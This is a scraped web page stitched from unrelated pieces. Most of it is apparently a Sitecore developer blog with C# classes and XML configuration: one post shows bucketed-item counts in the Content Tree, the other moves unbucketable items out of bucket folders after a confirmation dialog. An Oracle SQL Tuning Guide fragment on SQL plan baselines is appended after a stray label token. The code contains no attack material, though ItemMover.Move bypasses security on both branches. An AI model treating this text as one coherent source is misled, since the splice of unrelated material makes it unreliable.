bool IsAncestorOf(Item ancestor, Item item); void SortItems(ArrayList children, string sortBy, bool sortAscending); } } All of the methods in the above interface correspond to virtual methods defined on the Sitecore.Web.UI.HtmlControl.DataViewBase class in Sitecore.Kernel.dll. I then built the following abstract class which inherits from any DataView class that inherits from Sitecore.Web.UI.HtmlControl.DataViewBase: using System.Collections; using Sitecore.Collections; using Sitecore.Configuration; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Globalization; using Sitecore.Web.UI.HtmlControls; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public abstract class ExtendedDataView<TDataView> : DataViewBase where TDataView : DataViewBase { protected IDataViewBaseExtender DataViewBaseExtender { get; private set; } protected ExtendedDataView() { DataViewBaseExtender = GetDataViewBaseExtender(); EnsureDataViewBaseExtender(); } protected virtual IDataViewBaseExtender GetDataViewBaseExtender() { string configPath = GetDataViewBaseExtenderConfigPath(); Assert.IsNotNullOrEmpty(configPath, "GetDataViewBaseExtenderConfigPath() cannot return null or the empty string!"); IDataViewBaseExtender dataViewBaseExtender = Factory.CreateObject(configPath, false) as IDataViewBaseExtender; Assert.IsNotNull(dataViewBaseExtender, string.Format("the IDataViewBaseExtender instance was not defined properly in '{0}'!", configPath)); return dataViewBaseExtender; } protected abstract string GetDataViewBaseExtenderConfigPath(); protected virtual void EnsureDataViewBaseExtender() { Assert.IsNotNull(DataViewBaseExtender, "GetDataViewBaseExtender() cannot return a null IDataViewBaseExtender instance!"); } protected override void FilterItems(ref ArrayList children, string filter) { DataViewBaseExtender.FilterItems(ref children, filter); } protected override void GetChildItems(ItemCollection items, Item item) { DataViewBaseExtender.GetChildItems(items, item); } public override Database GetDatabase() { return DataViewBaseExtender.GetDatabase(); } protected override Item GetItemFromID(string id, Language language, Version version) { return DataViewBaseExtender.GetItemFromID(id, language, version); } protected override Item GetParentItem(Item item) { return DataViewBaseExtender.GetParentItem(item); } public override bool HasChildren(Item item, string filter) { return DataViewBaseExtender.HasChildren(item, filter); } public override void Initialize(string parameters) { DataViewBaseExtender.Initialize(parameters); } public override bool IsAncestorOf(Item ancestor, Item item) { return DataViewBaseExtender.IsAncestorOf(ancestor, item); } protected override void SortItems(ArrayList children, string sortBy, bool sortAscending) { DataViewBaseExtender.SortItems(children, sortBy, sortAscending); } } } The GetDataViewBaseExtender() method gets the config path for the configuration-defined IDataViewBaseExtender — these IDataViewBaseExtender configuration definitions may or may not have nested configuration elements which will also be instantiated by the Sitecore Configuration Factory — from the abstract GetDataViewBaseExtenderConfigPath() method (subclasses must define this method). The GetDataViewBaseExtender() then employs the Sitecore Configuration Factory to create this IDataViewBaseExtender instance, and return it to the caller (it’s being called in the class’ constructor). If the instance is null, an exception is thrown. All other methods in the above class delegate to methods with the same name and parameters on the IDataViewBaseExtender instance. I then built the following subclass of the abstract class above: using Sitecore.Web.UI.HtmlControls; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public class ExtendedMasterDataView : ExtendedDataView<MasterDataView> { protected override string GetDataViewBaseExtenderConfigPath() { return "extendedDataViews/extendedMasterDataView"; } } } The above class is used for extending the MasterDataView in Sitecore. It’s now time for the “real deal” DataView that does what we want: show the Bucketed Item counts for Item Buckets. The instance of the following class does just that: using System.Collections; using Sitecore.Buckets.Forms; using Sitecore.Collections; using Sitecore.Data; using Sitecore.Data.Fields; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Globalization; using Sitecore.Sandbox.Buckets.Providers.Items; using Sitecore.Sandbox.Buckets.Settings; using Sitecore.Sandbox.Buckets.Util.Methods; using Sitecore.Sandbox.Web.UI.HtmlControls.DataViews; namespace Sitecore.Sandbox.Buckets.Forms { public class BucketedItemsCountDataView : BucketDataView, IDataViewBaseExtender { protected IBucketsContentEditorSettings BucketsContentEditorSettings { get; set; } protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } protected IBucketedItemsCountProvider BucketedItemsCountProvider { get; set; } protected string SingularBucketedItemsDisplayNameFormat { get; set; } protected string PluralBucketedItemsDisplayNameFormat { get; set; } void IDataViewBaseExtender.FilterItems(ref ArrayList children, string filter) { FilterItems(ref children, filter); } void IDataViewBaseExtender.GetChildItems(ItemCollection children, Item parent) { GetChildItems(children, parent); } protected override void GetChildItems(ItemCollection children, Item parent) { base.GetChildItems(children, parent); if(!ShouldShowBucketedItemsCount()) { return; } for (int i = children.Count - 1; i >= 0; i--) { Item child = children[i]; if (IsItemBucket(child)) { int count = GetBucketedItemsCount(child); Item alteredItem = GetCountDisplayNameItem(child, count); children.RemoveAt(i); children.Insert(i, alteredItem); } } } protected virtual bool ShouldShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.ShowBucketedItemsCount; } protected virtual bool IsItemBucket(Item item) { Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!"); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucket(item); } protected virtual int GetBucketedItemsCount(Item itemBucket) { Assert.IsNotNull(BucketedItemsCountProvider, "BucketedItemsCountProvider must be set in configuration!"); Assert.ArgumentNotNull(itemBucket, "itemBucket"); return BucketedItemsCountProvider.GetBucketedItemsCount(itemBucket); } protected virtual Item GetCountDisplayNameItem(Item item, int count) { FieldList fields = new FieldList(); item.Fields.ReadAll(); foreach (Field field in item.Fields) { fields.Add(field.ID, field.Value); } int bucketedCount = GetBucketedItemsCount(item); string displayName = GetItemNameWithBucketedCount(item, bucketedCount); ItemDefinition itemDefinition = new ItemDefinition(item.ID, displayName, item.TemplateID, ID.Null); return new Item(item.ID, new ItemData(itemDefinition, item.Language, item.Version, fields), item.Database) { RuntimeSettings = { Temporary = true } }; } protected virtual string GetItemNameWithBucketedCount(Item item, int bucketedCount) { Assert.IsNotNull(SingularBucketedItemsDisplayNameFormat, "SingularBucketedItemsDisplayNameFormat must be set in configuration!"); Assert.IsNotNull(PluralBucketedItemsDisplayNameFormat, "PluralBucketedItemsDisplayNameFormat must be set in configuration!"); if (bucketedCount == 1) { return ReplaceTokens(SingularBucketedItemsDisplayNameFormat, item, bucketedCount); } return ReplaceTokens(PluralBucketedItemsDisplayNameFormat, item, bucketedCount); } protected virtual string ReplaceTokens(string format, Item item, int bucketedCount) { Assert.ArgumentNotNullOrEmpty(format, "format"); Assert.ArgumentNotNull(item, "item"); string replaced = format; replaced = replaced.Replace("$displayName", item.DisplayName); replaced = replaced.Replace("$bucketedCount", bucketedCount.ToString()); return replaced; } Database IDataViewBaseExtender.GetDatabase() { return GetDatabase(); } Item IDataViewBaseExtender.GetItemFromID(string id, Language language, Version version) { return GetItemFromID(id, language, version); } Item IDataViewBaseExtender.GetParentItem(Item item) { return GetParentItem(item); } bool IDataViewBaseExtender.HasChildren(Item item, string filter) { return HasChildren(item, filter); } void IDataViewBaseExtender.Initialize(string parameters) { Initialize(parameters); } bool IDataViewBaseExtender.IsAncestorOf(Item ancestor, Item item) { return IsAncestorOf(ancestor, item); } void IDataViewBaseExtender.SortItems(ArrayList children, string sortBy, bool sortAscending) { SortItems(children, sortBy, sortAscending); } } } You might be saying to yourself “Mike, what in the world is going on here?” 😉 Let me explain by starting with the GetChildItems() method. The GetChildItems() method is used to build up the collection of child Items that display in the Content Tree when you expand a parent node. It does this by populating the ItemCollection instance passed to it. The particular implementation above is delegating to the base class’ implementation to get the list of child Items for display in the Content Tree. If we should not show the Bucketed Items count — this is determined by the ShouldShowBucketedItemsCount() method which just returns the boolean value set on the ShowBucketedItemsCount property of the injected IBucketsContentEditorSettings instance — the code just exits. If we are to show the Bucketed Items count, we iterate over the ItemCollection collection and see if any of these child Items are Item Buckets — this is determined by the IsItemBucket() method. If we find an Item Bucket, we get its count of Bucketed Items via the GetBucketedItemsCount() method which delegates to the GetBucketedItemsCount() method on the injected IBucketedItemsCountProvider instance. Once we have the count, we call the GetCountDisplayNameItem() method which populates a FieldList collection with all of the fields defined on the Item Bucket; call the GetItemNameWithBucketedCount() method to get the new display name to show in the Content Tree — this method determines which display name format to use depending on whether we should use singular or pluralized messaging, and expands value on tokens via the ReplaceTokens() method — these tokens are defined in the patch configuration file below; creates an ItemDefinition instance so we can set the new display name; and returns a new Sitecore.Data.Items.Item instance to the caller. No, don’t worry, we aren’t adding a new Item in the content tree but creating a fake “wrapper” of the real one, and replacing this in the ItemCollection. We also have to fully implement the IDataViewBaseExtender interface. For most methods, I just delegate to the corresponding methods defined on the base class except for the IDataViewBaseExtender.GetChildItems() method which uses the GetChildItems() method defined above. I then bridged everything above together via the following patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <buckets> <extendedCommands> <toggleBucketedItemsCountCommand type="Sitecore.Sandbox.Buckets.Shell.Framework.Commands.ToggleBucketedItemsCountCommand, Sitecore.Sandbox" singleInstance="on"> <BucketsContentEditorSettings ref="buckets/settings/bucketsContentEditorSettings" /> </toggleBucketedItemsCountCommand> </extendedCommands> <providers> <items> <bucketedItemsCountProvider type="Sitecore.Sandbox.Buckets.Providers.Items.BucketedItemsCountProvider, Sitecore.Sandbox" singleInstance="true"> <searchIndexMaps hint="raw:AddSearchIndexMap"> <searchIndexMap database="master" searchIndex="sitecore_master_index" /> <searchIndexMap database="web" searchIndex="sitecore_web_index" /> </searchIndexMaps> </bucketedItemsCountProvider> </items> </providers> <settings> <bucketsContentEditorSettings type="Sitecore.Sandbox.Buckets.Settings.BucketsContentEditorSettings, Sitecore.Sandbox" singleInstance="true"> <ItemBucketsFeatureDeterminer ref="determiners/features/itemBucketsFeatureDeterminer"/> <Registry ref="registries/registry" /> <ShowBucketedItemsCountRegistryKey>/Current_User/UserOptions.View.ShowBucketedItemsCount</ShowBucketedItemsCountRegistryKey> </bucketsContentEditorSettings> </settings> </buckets> <commands> <command name="contenteditor:togglebucketeditemscount" type="Sitecore.Sandbox.Shell.Framework.Commands.ExtendedConfigCommand, Sitecore.Sandbox" extendedCommandPath="buckets/extendedCommands/toggleBucketedItemsCountCommand" /> </commands> <contentSearch> <indexConfigurations> <defaultLuceneIndexConfiguration> <fieldMap> <fieldNames> <field fieldName="item_bucket_ancestor_id" storageType="YES" indexType="TOKENIZED" vectorType="NO" boost="1f" type="System.String" settingType="Sitecore.ContentSearch.LuceneProvider.LuceneSearchFieldConfiguration, Sitecore.ContentSearch.LuceneProvider"> <analyzer type="Sitecore.ContentSearch.LuceneProvider.Analyzers.LowerCaseKeywordAnalyzer, Sitecore.ContentSearch.LuceneProvider" /> </field> <field fieldName="is_bucketed" storageType="YES" indexType="TOKENIZED" vectorType="NO" boost="1f" type="System.Boolean" settingType="Sitecore.ContentSearch.LuceneProvider.LuceneSearchFieldConfiguration, Sitecore.ContentSearch.LuceneProvider" /> </fieldNames> </fieldMap> <documentOptions> <fields hint="raw:AddComputedIndexField"> <field fieldName="item_bucket_ancestor_id">Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields.ItemBucketAncestorId, Sitecore.Sandbox</field> <field fieldName="is_bucketed">Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields.IsBucketed, Sitecore.Sandbox</field> </fields> </documentOptions> </defaultLuceneIndexConfiguration> </indexConfigurations> </contentSearch> <dataviews> <dataview name="Master"> <patch:attribute name="assembly">Sitecore.Sandbox</patch:attribute> <patch:attribute name="type">Sitecore.Sandbox.Web.UI.HtmlControls.DataViews.ExtendedMasterDataView</patch:attribute> </dataview> </dataviews> <extendedDataViews> <extendedMasterDataView type="Sitecore.Sandbox.Buckets.Forms.BucketedItemsCountDataView, Sitecore.Sandbox" singleInstance="true"> <BucketsContentEditorSettings ref="buckets/settings/bucketsContentEditorSettings" /> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <BucketedItemsCountProvider ref="buckets/providers/items/bucketedItemsCountProvider" /> <SingularBucketedItemsDisplayNameFormat>$displayName &lt;span style="font-style: italic; color: blue;"&gt;($bucketedCount bucketed item)&lt;span&gt;</SingularBucketedItemsDisplayNameFormat> <PluralBucketedItemsDisplayNameFormat>$displayName &lt;span style="font-style: italic; color: blue;"&gt;($bucketedCount bucketed items)&lt;span&gt;</PluralBucketedItemsDisplayNameFormat> </extendedMasterDataView> </extendedDataViews> <registries> <registry type="Sitecore.Sandbox.Web.UI.HtmlControls.Registries.Registry, Sitecore.Sandbox" singleInstance="true" /> </registries> </sitecore> </configuration> bridge-collapse Let’s see this in action: bucketed-items-count-testing As you can see, it is working as intended. partay-hard Magical, right? magic Well, not really — it just appears that way. 😉 magic-not-really If you have any thoughts on this, please drop a comment. Prevent Unbucketable Sitecore Items from Being Moved to Bucket Folders If you’ve been reading my posts lately, you have probably noticed I’ve been having a ton of fun with Sitecore Item Buckets. I absolutely love this feature in Sitecore. As a matter of, I love Item Buckets so much, I’m doing a presentation on them just next week at the Greater Cincinnati Sitecore Users Group. If you’re in the neighborhood, stop by — even if it’s only to say “Hello”. Anyways, back to the post. I noticed the following grey box on the Items Buckets page on the Sitecore Documentation site: item-buckets-unbucketable-import This got me thinking: why can’t we build something in Sitecore to prevent this from happening in the first place? In other words, why can’t we just say “sorry, you can’t move an unbucketable Item into a bucket folder”? nope So, that’s what I decided to do — build a solution that prevents this from happening. Let’s have a look at what I came up with. I first created the following interface for classes whose instances will move a Sitecore item to a destination Item: using Sitecore.Data.Items; namespace Sitecore.Sandbox.Utilities.Items.Movers { public interface IItemMover { bool DisableSecurity { get; set; } bool ShouldBeMoved(Item item, Item destination); void Move(Item item, Item destination); } } I then defined the following class which implements the interface above: using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.SecurityModel; namespace Sitecore.Sandbox.Utilities.Items.Movers { public class ItemMover : IItemMover { public bool DisableSecurity { get; set; } public virtual bool ShouldBeMoved(Item item, Item destination) { return item != null && destination != null; } public virtual void Move(Item item, Item destination) { if (!ShouldBeMoved(item, destination)) { return; } if(DisableSecurity) { MoveWithoutSecurity(item, destination); return; } MoveWithoutSecurity(item, destination); } protected virtual void MoveWithSecurity(Item item, Item destination) { Assert.ArgumentNotNull(item, "item"); Assert.ArgumentNotNull(destination, "destination"); item.MoveTo(destination); } protected virtual void MoveWithoutSecurity(Item item, Item destination) { Assert.ArgumentNotNull(item, "item"); Assert.ArgumentNotNull(destination, "destination"); using (new SecurityDisabler()) { item.MoveTo(destination); } } } } Callers of the above code can move an Item from one location to another with/without Sitecore security in place. The ShouldBeMoved() above is basically a stub that will allow subclasses to define their own rules on whether an Item should be moved, depending on whatever rules must be met. I then defined the following subclass of the class above which has its own rules on whether an Item should be moved (i.e. move this unbucketable Item out of a bucket folder if makes its way there): using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; using Sitecore.Sandbox.Utilities.Items.Movers; namespace Sitecore.Sandbox.Buckets.Util.Items.Movers { public class UnbucketableItemMover : ItemMover { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } public override bool ShouldBeMoved(Item item, Item destination) { return base.ShouldBeMoved(item, destination) && !IsItemBucketable(item) && IsItemInBucket(item) && !IsItemBucketFolder(item) && IsItemBucketFolder(item.Parent) && IsItemBucket(destination); } protected virtual bool IsItemBucketable(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucketable(item); } protected virtual bool IsItemInBucket(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item); } protected virtual bool IsItemBucketFolder(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucketFolder(item); } protected virtual bool IsItemBucket(Item item) { EnsureItemBucketFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucket(item); } protected virtual void EnsureItemBucketFeatureMethods() { Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!"); } } } I’m injecting an instance of an IItemBucketsFeatureMethods class — this interface and its implementation are defined in my previous post; go have a look if you have not read that post so you can be familiar with the IItemBucketsFeatureMethods code — via the Sitecore Configuration Factory which contains common methods I am using in my Item Bucket code solutions (I will be using this in future posts). The ShouldBeMoved() method basically says that an Item can only be moved when the Item and destination passed aren’t null — this is defined on the base class’ ShouldBeMoved() method; the Item isn’t bucketable; the Item is already in an Item Bucket; the Item isn’t a Bucket Folder; the Item’s parent Item is a Bucket Folder; and the destination is an Item Bucket. Yes, the above sounds a bit confusing though there is a reason for it — I want to take an unbucketable Item out of a Bucket Folder and move it directly under the Item Bucket instead. I then created the following class which contains methods that will serve as “item:moved” event handlers: using System; using System.Collections.Generic; using Sitecore.Data; using Sitecore.Data.Events; using Sitecore.Data.Items; using Sitecore.Events; using Sitecore.Sandbox.Buckets.Util.Methods; using Sitecore.Sandbox.Utilities.Items.Movers; namespace Sitecore.Sandbox.Buckets.Events.Items.Move { public class RemoveFromBucketFolderIfNotBucketableHandler { protected static SynchronizedCollection<ID> ItemsBeingProcessed { get; set; } protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } protected IItemMover UnbucketableItemMover { get; set; } protected void OnItemMoved(object sender, EventArgs args) { Item item = GetItem(args); RemoveFromBucketFolderIfNotBucketable(item); } static RemoveFromBucketFolderIfNotBucketableHandler() { ItemsBeingProcessed = new SynchronizedCollection<ID>(); } protected virtual Item GetItem(EventArgs args) { if (args == null) { return null; } return Event.ExtractParameter(args, 0) as Item; } protected void OnItemMovedRemote(object sender, EventArgs args) { Item item = GetItemRemote(args); RemoveFromBucketFolderIfNotBucketable(item); } protected virtual Item GetItemRemote(EventArgs args) { ItemMovedRemoteEventArgs remoteArgs = args as ItemMovedRemoteEventArgs; if (remoteArgs == null) { return null; } return remoteArgs.Item; } protected virtual void RemoveFromBucketFolderIfNotBucketable(Item item) { if(item == null) { return; } Item itemBucket = GetItemBucket(item); if (itemBucket == null) { return; } if(!ShouldBeMoved(item, itemBucket)) { return; } AddItemBeingProcessed(item); MoveUnderItemBucket(item, itemBucket); RemoveItemBeingProcessed(item); } protected virtual bool IsItemBeingProcessed(Item item) { if (item == null) { return false; } return ItemsBeingProcessed.Contains(item.ID); } protected virtual void AddItemBeingProcessed(Item item) { if (item == null) { return; } ItemsBeingProcessed.Add(item.ID); } protected virtual void RemoveItemBeingProcessed(Item item) { if (item == null) { return; } ItemsBeingProcessed.Remove(item.ID); } protected virtual Item GetItemBucket(Item item) { if(ItemBucketsFeatureMethods == null || item == null) { return null; } return ItemBucketsFeatureMethods.GetItemBucket(item); } protected virtual bool ShouldBeMoved(Item item, Item itemBucket) { if(UnbucketableItemMover == null) { return false; } return UnbucketableItemMover.ShouldBeMoved(item, itemBucket); } protected virtual void MoveUnderItemBucket(Item item, Item itemBucket) { if (UnbucketableItemMover == null) { return; } UnbucketableItemMover.Move(item, itemBucket); } } } Both the OnItemMoved() and OnItemMovedRemote() methods extract the moved Item from their specific methods for getting the Item from the EventArgs instance. If that Item is null, the code exits. Both methods pass their Item instance to the RemoveFromBucketFolderIfNotBucketable() method which ultimately attempts to grab an Item Bucket ancestor of the Item via the GetItemBucket() method. If no Item Bucket instance is returned, the code exits. If an Item Bucket was found, the RemoveFromBucketFolderIfNotBucketable() method ascertains whether the Item should be moved — it makes a call to the ShouldBeMoved() method which just delegates to the IItemMover instance injected in via the Sitecore Configuration Factory (have a look at the patch configuration file below). If the Item should not be moved, then the code exits. If it should be moved, it is then passed to the MoveUnderItemBucket() method which delegates to the Move() method on the IItemMover instance. You might be asking “Mike, what’s up with the ItemsBeingProcessed SynchronizedCollection of Item IDs?” I’m using this collection to maintain which Items are currently being moved so we don’t have racing conditions in code. You might be thinking “Great, we’re done!” no We can’t just move an Item from one destination to another, especially when the user selected the first destination. We should let the user know that we will need to move the Item as it is unbucketable. Let’s not be evil. evil I created the following class whose Process() method will serve as a custom processor for both the <uiDragItemTo> and <uiMoveItems> pipelines of the Sitecore Client: using System; using System.Collections.Generic; using System.Linq; using Sitecore.Configuration; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Text; using Sitecore.Web.UI.Sheer; using Sitecore.Sandbox.Buckets.Util.Methods; namespace Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems { public class ConfirmMoveOfUnbucketableItem { protected string ItemIdsParameterName { get; set; } protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } protected string ConfirmationMessageFormat { get; set; } public void Process(ClientPipelineArgs args) { Assert.ArgumentNotNull(args, "args"); IEnumerable<string> itemIds = GetItemIds(args); if (itemIds == null || !itemIds.Any() || itemIds.Count() > 1) { return; } string targetId = GetTargetId(args); if (string.IsNullOrWhiteSpace(targetId)) { return; } Database database = GetDatabase(args); if (database == null) { return; } Item targetItem = GetItem(database, targetId); if (targetItem == null || !IsItemBucketOrIsItemInBucket(targetItem)) { return; } Item item = GetItem(database, itemIds.First()); if (item == null || IsItemBucketable(item)) { return; } Item itemBucket = GetItemBucket(targetItem); if (itemBucket == null) { return; } SetTokenValues(args, item, itemBucket); ConfirmMove(args); } protected virtual IEnumerable<string> GetItemIds(ClientPipelineArgs args) { Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); string itemIdsParameterName = GetItemIdsParameterName(args); Assert.IsNotNullOrEmpty(itemIdsParameterName, "GetItemIdParameterName() cannot return null or the empty string!"); return new ListString(itemIdsParameterName, '|'); } protected virtual string GetItemIdsParameterName(ClientPipelineArgs args) { Assert.IsNotNullOrEmpty(ItemIdsParameterName, "ItemIdParameterName must be set in configuration!"); Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); return args.Parameters[ItemIdsParameterName]; } protected virtual string GetTargetId(ClientPipelineArgs args) { Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); return args.Parameters["target"]; } protected virtual Database GetDatabase(ClientPipelineArgs args) { Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); return Factory.GetDatabase(args.Parameters["database"]); } protected virtual Item GetItem(Database database, string itemId) { Assert.ArgumentNotNull(database, "database"); Assert.ArgumentNotNullOrEmpty(itemId, "itemId"); try { return database.GetItem(itemId); } catch(Exception ex) { Log.Error(ToString(), ex, this); } return null; } protected virtual bool IsItemBucketOrIsItemInBucket(Item item) { EnsureItemBucketsFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return IsItemBucket(item) || IsItemInBucket(item); } protected virtual bool IsItemBucket(Item item) { EnsureItemBucketsFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucket(item); } protected virtual bool IsItemInBucket(Item item) { EnsureItemBucketsFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item); } protected virtual bool IsItemBucketable(Item item) { EnsureItemBucketsFeatureMethods(); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucketable(item); } protected virtual Item GetItemBucket(Item item) { EnsureItemBucketsFeatureMethods(); Assert.ArgumentNotNull(item, "item"); if(!ItemBucketsFeatureMethods.IsItemBucket(item)) { return ItemBucketsFeatureMethods.GetItemBucket(item); } return item; } protected virtual void SetTokenValues(ClientPipelineArgs args, Item item, Item itemBucket) { Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); Assert.ArgumentNotNull(item, "item"); Assert.ArgumentNotNull(itemBucket, "itemBucket"); args.Parameters["$itemName"] = item.Name; args.Parameters["$itemBucketName"] = itemBucket.Name; args.Parameters["$itemBucketFullPath"] = itemBucket.Paths.FullPath; } protected virtual void ConfirmMove(ClientPipelineArgs args) { Assert.ArgumentNotNull(args, "args"); if(args.IsPostBack) { if (args.Result == "yes") { ClearResult(args); return; } if (args.Result == "no") { args.AbortPipeline(); return; } } else { SheerResponse.Confirm(GetConfirmationMessage(args)); args.WaitForPostBack(); } } protected virtual void ClearResult(ClientPipelineArgs args) { args.Result = string.Empty; args.IsPostBack = false; } protected virtual string GetConfirmationMessage(ClientPipelineArgs args) { Assert.IsNotNullOrEmpty(ConfirmationMessageFormat, "ConfirmationMessageFormat must be set in configuration!"); Assert.ArgumentNotNull(args, "args"); return ReplaceTokens(ConfirmationMessageFormat, args); } protected virtual string ReplaceTokens(string messageFormat, ClientPipelineArgs args) { Assert.ArgumentNotNullOrEmpty(messageFormat, "messageFormat"); Assert.ArgumentNotNull(args, "args"); Assert.ArgumentNotNull(args.Parameters, "args.Parameters"); string message = messageFormat; message = message.Replace("$itemName", args.Parameters["$itemName"]); message = message.Replace("$itemBucketName", args.Parameters["$itemBucketName"]); message = message.Replace("$itemBucketFullPath", args.Parameters["$itemBucketFullPath"]); return message; } protected virtual void EnsureItemBucketsFeatureMethods() { Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!"); } } } The Process() method above gets the Item ID for the Item that is being moved; the Item ID for the destination Item — this is referred to as the “target” in the code above; gets the Database instance of where we are moving this Item; the instances of both the Item and target Item; determines if the Target Item is a Bucket Folder or an Item Bucket; determines if the Item is unbucketable; and then the Item Bucket (this could be the target Item). If any of of the instances above are null, the code exits. If the Item is unbucketable but is being moved to a Bucket Folder or Item Bucket, we prompt the user with a confirmation dialog asking him/her whether he/she should like to continue given that the Item will be moved directly under the Item Bucket. If the user clicks the ‘Ok’ button, the Item is moved. Otherwise, the pipeline is aborted and the Item will not be moved at all. I then pieced all of the above together via the following patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <buckets> <movers> <items> <unbucketableItemMover type="Sitecore.Sandbox.Buckets.Util.Items.Movers.UnbucketableItemMover, Sitecore.Sandbox" singleInstance="true"> <DisableSecurity>true</DisableSecurity> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> </unbucketableItemMover> </items> </movers> </buckets> <events> <event name="item:moved"> <handler type="Sitecore.Sandbox.Buckets.Events.Items.Move.RemoveFromBucketFolderIfNotBucketableHandler, Sitecore.Sandbox" method="OnItemMoved"> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <UnbucketableItemMover ref="buckets/movers/items/unbucketableItemMover" /> </handler> </event> <event name="item:moved:remote"> <handler type="Sitecore.Sandbox.Buckets.Events.Items.Move.RemoveFromBucketFolderIfNotBucketableHandler, Sitecore.Sandbox" method="OnItemMovedRemote"> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <UnbucketableItemMover ref="buckets/movers/items/unbucketableItemMover" /> </handler> </event> </events> <processors> <uiDragItemTo> <processor patch:before="processor[@type='Sitecore.Buckets.Pipelines.UI.ItemDrag, Sitecore.Buckets' and @method='Execute']" type="Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems.ConfirmMoveOfUnbucketableItem, Sitecore.Sandbox" mode="on"> <ItemIdsParameterName>id</ItemIdsParameterName> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <ConfirmationMessageFormat>You are attempting to move the non-bucketable Item: $itemName to a bucket folder. If you continue, it will be moved directly under the Item Bucket: $itemBucketName ($itemBucketFullPath). Do you wish to continue?</ConfirmationMessageFormat> </processor> </uiDragItemTo> <uiMoveItems> <processor patch:before="processor[@type='Sitecore.Buckets.Pipelines.UI.ItemMove, Sitecore.Buckets' and @method='Execute']" type="Sitecore.Sandbox.Buckets.Shell.Framework.Pipelines.MoveItems.ConfirmMoveOfUnbucketableItem, Sitecore.Sandbox" mode="on"> <ItemIdsParameterName>items</ItemIdsParameterName> <ItemBucketsFeatureMethods ref="buckets/methods/itemBucketsFeatureMethods" /> <ConfirmationMessageFormat>You are attempting to move the non-bucketable Item: $itemName to a bucket folder. If you continue, it will be moved directly under the Item Bucket: $itemBucketName ($itemBucketFullPath). Do you wish to continue?</ConfirmationMessageFormat> </processor> </uiMoveItems> </processors> </sitecore> </configuration> Let’s see how we did. jenga-topple Let’s move this unbucketable Item to an Item Bucket: move-unbucketable-1 Yes, I’m sure I’m sure: move-unbucketable-2 I was then prompted with the confirmation dialog as expected: move-unbucketable-3 As you can see, the Item was placed directly under the Item Bucket: move-unbucketable-4 If you have any thoughts on this, please drop a comment. thats-all-folks
__label__pos
0.95056
Skip Headers Oracle® Database SQL Tuning Guide 12c Release 1 (12.1) E15858-15 Go to Documentation Home Home Go to Book List Book List Go to Table of Contents Contents Go to Index Index Go to Master Index Master Index Go to Feedback page Contact Us Go to previous page Previous Go to next page Next PDF · Mobi · ePub 23 Managing SQL Plan Baselines This chapter explains the concepts and tasks relating to SQL plan management using the DBMS_SPM package. This chapter contains the following topics: 23.1 About SQL Plan Management SQL plan management is a preventative mechanism that enables the optimizer to automatically manage execution plans, ensuring that the database uses only known or verified plans. In this context, a plan includes all plan-related information (for example, SQL plan identifier, set of hints, bind values, and optimizer environment) that the optimizer needs to reproduce an execution plan. SQL plan management uses a mechanism called a SQL plan baseline. A plan baseline is a set of accepted plans that the optimizer is allowed to use for a SQL statement. In the typical use case, the database accepts a plan into the plan baseline only after verifying that the plan performs well. The main components of SQL plan management are as follows: • Plan capture This component stores relevant information about plans for a set of SQL statements. See "Plan Capture". • Plan selection This component is the detection by the optimizer of plan changes based on stored plan history, and the use of SQL plan baselines to select appropriate plans to avoid potential performance regressions. See "Plan Selection". • Plan evolution This component is the process of adding new plans to existing SQL plan baselines, either 